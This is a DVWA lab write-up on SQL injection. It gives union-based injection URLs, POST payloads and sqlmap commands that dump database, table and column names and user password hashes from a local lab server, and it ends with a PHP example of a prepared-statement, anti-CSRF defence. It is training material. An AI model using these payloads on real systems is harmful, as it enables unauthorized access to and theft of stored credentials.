DVWA Lab 1: SQL Injection

---level: low---

At this level the page displays both the server's error messages and the query results.

#Finding the injection point

http://localhost/vulnerabilities/sqli/?id=1

http://localhost/vulnerabilities/sqli/?id=1'

http://localhost/vulnerabilities/sqli/?id=1' and 1=1

http://localhost/vulnerabilities/sqli/?id=1' and 1=2

#Normal parameter
http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit

#Check whether the parameter is an injection point
http://localhost/vulnerabilities/sqli/?id=1'&Submit=Submit

#Dump the current database name
http://localhost/vulnerabilities/sqli/?id=1' union select 1,database()-- &Submit=Submit

#Dump the tables of the database
http://localhost/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables where table_schema='dvwa'-- &Submit=Submit

#Dump the columns of the table
http://localhost/vulnerabilities/sqli/?id=1' union select 1,column_name from information_schema.columns where TABLE_NAME='users'-- &Submit=Submit

#Dump the table data
http://localhost/vulnerabilities/sqli/?id=1' union select 1,concat(user,password) from users-- &Submit=Submit


---level: medium---
The data is sent in a POST request, so it is not visible in the URL and has to be edited with Burp Suite. The backend also escapes special characters, so the SQL payload cannot contain \x00, \n, \r, \, ', " or \x1a; any concrete values are instead obtained through SQL itself (for example database()).

#Dump the table names of the database currently in use (database())

id=2 union select 1, table_name from information_schema.tables where table_schema=database()-- &Submit=Submit

#Dump table names (used as a subquery below)
select table_name from information_schema.tables where table_schema=database()

#Dump columns
id=2 union select 1, column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 1,1)-- &Submit=Submit

#Dump data
id=1 union select 1, concat(user,password) from users-- &Submit=Submit

sqlmap -u "http://192.168.43.140/vulnerabilities/sqli" --data "id=1&Submit=Submit#" --cookie="PHPSESSID=q5fhguekr1jlmp3dnggoahajbt; security=medium" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump


---level: high---

Same as the previous levels, except that this is a second-order injection: the page with the injection point and the page showing the result are two different pages.
sqlmap -u "192.168.43.140/vulnerabilities/sqli/session-input.php#" --second-url "http://192.168.43.140/vulnerabilities/sqli" --data "id=1&Submit=Submit#" --cookie="PHPSESSID=1sfidb68smb7koe3j0o7m44hf7; security=high" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump


---level: impossible---

The backend uses an Anti-CSRF token mechanism, which effectively raises the security level, and uses precompiled (prepared) statements to enforce the validity of the parameter.
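The following is an added illustration, not DVWA's own source: the low-level string-concatenation pattern beside a hardened handler that combines the two controls described above (per-session anti-CSRF token and a prepared statement with a typed parameter). The function names, the `$pdo` connection and the `$session`/`$post` arrays are assumptions for the example.

```php
<?php
// Added example (not DVWA's code). Assumes a PDO connection $pdo to the dvwa
// database and a PHP session array that holds the anti-CSRF token.

// Low-level pattern: the id parameter is concatenated straight into the SQL,
// so a value such as 1' union select 1,database()-- changes the query itself.
function lookupUserUnsafe(PDO $pdo, string $id): array {
    $sql = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened handler in the style of the "impossible" level.
function lookupUserSafe(PDO $pdo, array $post, array $session): array {
    // 1. Anti-CSRF token: refuse the request unless it carries the session's
    //    token; hash_equals avoids a timing side channel on the comparison.
    if (!isset($post['user_token'], $session['session_token'])
        || !hash_equals($session['session_token'], (string) $post['user_token'])) {
        throw new RuntimeException('CSRF token incorrect');
    }
    // 2. Type check: user_id is numeric, so anything else is rejected early
    //    (this alone would already stop the quote-based payloads above).
    if (!isset($post['id']) || !ctype_digit((string) $post['id'])) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    // 3. Prepared statement: the value is sent separately from the query text
    //    and can never be parsed as SQL syntax, escaping or not.
    $stmt = $pdo->prepare(
        'SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1'
    );
    $stmt->bindValue(':id', (int) $post['id'], PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Token issuance: called when rendering the form, stored in the session and
// echoed into a hidden user_token field.
function issueToken(array &$session): string {
    $session['session_token'] = bin2hex(random_bytes(16));
    return $session['session_token'];
}
```

The hardened handler fails closed on every check, which is why sqlmap's union and second-order techniques from the earlier levels no longer have anything to work with.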


Environment:

DBMS: MySQL
OS: Windows Server 2016
DVWA server
Apache
PHP
